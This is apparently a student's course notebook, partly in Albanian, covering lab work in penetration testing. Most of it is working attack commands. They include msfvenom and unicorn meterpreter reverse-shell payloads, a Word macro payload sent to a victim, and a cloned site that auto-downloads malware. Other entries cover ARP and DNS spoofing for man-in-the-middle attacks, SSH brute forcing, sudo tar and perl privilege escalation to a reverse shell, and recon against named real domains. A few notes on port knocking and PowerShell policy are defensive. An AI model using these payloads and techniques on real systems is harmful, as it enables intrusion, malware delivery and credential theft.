dokuwiki

25.06.2018, module Day 1

host?
ip?
mac?
protocol? a set of rules qe e definon punen, 
applications: ftp, ssh, dns, ssh, snmp, ldap, http, https, rdp, pop, smtp, ntp
tcp? secure, connection oriented
udp? known as streaming protocol, connection less, 
layer security - defenc in depth

dns spoofing: redirect technice and arp &ssl strip technice
session hijacking: nese se ke config mire web serverin cookies and sessions
big mac attack or 
rough AP --
pineapple wifi -- jepet prej hackfive, bon mitm, 
thc -- thc.oil, tools per rough ap, hydra, thc-ssl-dos attacks,  

hell, dark web
1337 zero day web
defcon.org, tool qe perdoren mrena conf
stegano grafia
wight space attack, snow, steghigh
carbon black
kiosk mode (nLinux)
deceptive technology 
pop, good per brute force
green threadings
ntp: 

promiscuous mode: Allows a NIC to receive all traffic on the network, even if it is not addressed to this NIC

surf this platform
setoolkit: platform that has tool to clone a website



nmap UDP scan

filnename.py
import os
os.
##########################################################################################
27.06.2018, module Day 2

github,
me search ne github
db ku dev, hackers fix a problem in their way and share it with othser
chck for exploit, teknik, ide se qysh e kan fiz te tjeret nje problem
github account
git - idhet prems nje url

unicorn
.# git clone  https://github.com/trustedsec/unicorn.git (url marr nga github).
.# cd unicorn/
.# python unicorn.py --help
.# python unicorn.py windown/meterpreter/reverse_tcp 172.16.60.84 4455 (i gjeneron powershell_attack.txt, unicorn.rc)
.# msfconsole  -r unicorn.rc (e aktivizon multi handler me ngu ne port te cakuar)

copy paste to victim
codin qe ndodhet ne powershell_attack.txt e ekzekuton nga ndonje powershell apo cmd e nja windowsi.
ky kod mund dhe duhet perdour imagjinaten se si me bo dikan me executu.
psh 
.# python -m SimpleHTTPServer 80 (e publikon qat file dhe manualisht e executon

.-----------------------------------------------------------------------------------------------------------------------------------------------------
*embedded macro*

root@kali:/cyber/macro# python unicorn.py windows/meterpreter/reverse_tcp 172.16.60.84 4455 macro
codin qe ndodhet ne powershell_attack.txt e embed ne macro te word psh
dhe ja dergon viktimes
# msfconsole  -r unicorn.rc (e aktivizon multi handler me ngu ne port te cakuar)

.-----------------------------------------------------------------------------------------------------------------------------------------------------

root@kali:/PythonEmpire/Empire# pip  install iptools (nese mungon
root@kali:/PythonEmpire/Empire# pip  install netifaces  (nese mungon
root@kali:/PythonEmpire/Empire/setup# ./install.sh
root@kali:/PythonEmpire/Empire# ./empire ( me hap

(Empire) > listeners
(Empire: listeners) > uselistener http
(Empire: listeners/http) > info
(Empire: listeners/http) > set Host 172.16.60.84
(Empire: listeners/http) > execute
(Empire: listeners/http) > back
(Empire: listeners/http) > use stage


CVE nitre
Bloodhound
root@kali:/cyber/# apt-get install  bloodhound
.# neo4j console --to open
root@kali:/cyber# pip install bloodhound


munesh mi fshi kta folldera Sami
C:\Program Files (x86)\WindowsPowerShell
C:\Program Files\WindowsPowerShell
C:\Windows\System32\WindowsPowerShell
C:\Windows\SysWOW64\WindowsPowerShell

ose me rrit sigurine per mos me ekzekutu scripta t ndryshme
https://github.com/eapowertools/ReactivateUsers/wiki/Changing-Execution-Signing-Policy-in-Powershell
https://github.com/eapowertools/ReactivateUsers/wiki/Changing-Execution-Signing-Policy-in-Powershell

.##########################################################################################
29.06.2018, module Day 3

iceberg, app sec, net sec,

port knocking, security ne port level, 
initail proccess: 1. secquen numbers, 2. porta hapet me nje kohe te caktuar 


Target:
ICEBERG: 172.16.60.65
http://172.16.60.65/
chat()
logdata()
GET /s4bryfeyzUll4hu.log

cat s4bryfeyzUll4hu.log | grep "USER" | cut -d " " -f 28 | sort -u
user : c89udwh
pass : AwSg6UVrnk%SW==



##########################################################################################
02.07.2018, module Day 4


install a tftp server ( see write up)

*theHarvester*
git clone https://github.com/laramies/theHarvester.git (to download
cd theHarvester
python theHarvester.py -d ickosovo.com -b google
python theHarvester.py -d ickosovo.com -b google -l 400


*Metagoofil*
git clone https://github.com/laramies/metagoofil.git
cd metagoofil
python metagoofil.py -d apple.com -t doc,pdf -l 200 -n 50 -o applefiles -f results.html

*dnsrecon*
-d (domain
-r (range
dnsrecon -d teb-kos.com
dnsrecon -r 91.187.97.144/28

*dnscan*
cd dnscan
python dnscan.py -d teb-kos.com


bypass cludflare:
-me i cut old databases (mafia cloud i ka history nga xx ne cluld flare
-cpanel e pingon ta kthen IP
-gjat krijimit e gabon IP e vet me te host
-brootforce

*subdomain list*
git clone  https://github.com/aboul3la/Sublist3r.git
cd Sublist3
python sublist3r.py -d name.com -t 3 -e bing  
python sublist3r.py -d name.com -t 3 -e google
python sublist3r.py -d name.com -t 3 -e yahoo




site:"ickosovo" file:"jpeg"
inurl:"index.php"
intext:"rraci"
.##########################################################################################
04.07.2018, module Day 5


.##########################################################################################
06.07.2018, module Day 6

target: remote.com
mi gjet email, domain, sub domains, IP address pa cloudProtection etj

python theHarvester.py -d remote.com -b bing -l 400 (.py skripta duher shkarkuar paraprakisht)
theharvester -d remote.com -l 500 -b google
theharvester -d remote.com -l 500 -b all
dnsenum remote.com
dig remote.com
host remote.com
dnsrecon -d remote.com

bypass cloudflare, websploit 
.##########################################################################################
09.07.2018, module4 Day 7

https://www.digitalocean.com/community --VPS solution
https://www.digitalocean.com/community/questions/how-to-config-port-knocking-on-csf-and-access-it-by-linux

**PORT KNOCKING**
https://download.configserver.com/csf.tgz
install knocked
cd /etc/csf/ 
nano csf.conf
TCPIN = "22" --direct access only 22
PORTKNOCKING = "80;TCP;30;1000;1001;1002;1003" --to allow knocking for port 80 with seq.
csf -r --to restart

*change default port 22 to 65500*
vi /etc/apache2/ports.conf
80 -> 65500
service apache2 restart

*new port 65000 me bo me port knocking*
.##########################################################################################
11.07.2018, module4 Day 8
DNSENUM
DNSRECON
ARCHIVE.ORG
metagufil
theharvester
whois
ickosovo.com

info gethering

part1 - summary
part2 - info per secilen tool dhe infot e nxerrne
part3 - permbyllja
.##########################################################################################
13.07.2018, module4 Day 9

missed

.##########################################################################################
16.07.2018, module4 Day 10
https://www.hak5.org/
alfa network card
hsps

MITM-ARP-spoofing
driftnet  --tenton capture images with http links
dnsspoof --
arpspoof --qon probe request (to ack like gw)
ettercap --packet capture tool ??
urlsnarf --i dump url captcured
zANTI --per redirect requests

ARP?
sniffing
poisoning
vector of attack, 
------------------------------------------------------------------------------------------
**MITM man in the middle**
echo 1 > /proc/sys/net/ipv4/ip_forward --enable IP forwarding (/proc) 
.60.79 win7 viktima
.60.72 kali hacker machine
.60.1 original Gateway
arpspoof -i eth0 -t 172.16.60.79 172.16.60.1
arpspoof -i eth0 -t 172.16.60.1 172.16.60.79
inicon nga viktima traffic 
ettercap -T -q -i eth0
----------------------------------------------------------------------------------------
**dnsspoofing**
nano host.txt
172.16.60.72 www*
172.16.60.72 ickosovo.com

arpspoof -i eth0 -t 172.16.60.79 172.16.60.1
arpspoof -i eth0 -t 172.16.60.1 172.16.60.79

dnsspoof -i eth0 -f host.txt
--------------------------------------------------------------------------------------
**me clone nje web using set toolkit** ( web exportetohet ne /root/.set/web-clone)
index.html e zhvendos ne /var/www/html
ne /var/www/html e generon nje malware .exe:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.60.79 LPORT=5560 -f exe -o test-update.exe
edito index.html -- add: <meta http-equiv="refresh" content="1;url=test-update.exe">   
service apache2 start
http://ip e apache2/index.html (qelet web dhe file fillon mu download)

.##########################################################################################
18.07.2018, module4 Day 11

Stage1
build malware, upload in fake web, auto download OS base

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.60.72 LPORT=5560 -f elf -o test-update.elf
msfvenom -p Android/meterpreter/reverse_tcp LHOST=172.16.60.72 LPORT=5560 R>test-update.apk

<!DOCTYPE HTML>
<html>
<head>
       <script>
               if (navigator.appVersion.indexOf("Win")!=-1){
                        window.location.assign("winshell.exe");
               }
               if (navigator.appVersion.indexOf("Mac")!=-1) {
                       window.location.assign("");
               }
               if (navigator.appVersion.indexOf("Android")!=-1){
                       window.location.assign("androidshell.apk");
               }
               if (navigator.appVersion.indexOf("Linux x86_64")!=-1){
                       window.location.assign("linuxshell.elf");
               }

       </script>
</head>
</html>
------------------------------------------------------------
msf
set
mitm
.##########################################################################################
20.07.2018, module4 Day 12

target 1
172.16.60.72
user:ick

target2
172.16.60.69, portknocking, ssh 1000 5000 9000

nmap -sV  172.16.60.69
ORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.5p1 Ubuntu 10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.27 ((Ubuntu))
MAC Address: 00:DB:DF:54:18:07 (Intel Corporate)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
--------
dirb  http://172.16.60.72 --directory
hydra -l ick -P /root/Desktop/rockyou.txt 172.16.60.72 ssh --brute force
sudo -u root tar cf /dev/null /temp/exploit --checkpoint=1 --checkpoint-action=exec=/bin/bash --te jep root access

#nc -z 172.16.60.69 100 5000 9000
#ssh arben@172.16.60.69
#arben@172.16.60.69's password:arben1!1
$ :)
next step village escalation
$ sudo -l --found (ALL) NOPASSWD: /usr/bin/perl
sudo -u root 

root@kali:/# nc -lvp 80 --e hap nje port
$ sudo perl rv1.pl --perl reverse shell found in github
edito: ip e machine tane edhe porten qe e ke bo ne ngu me nc -lvp 80 psh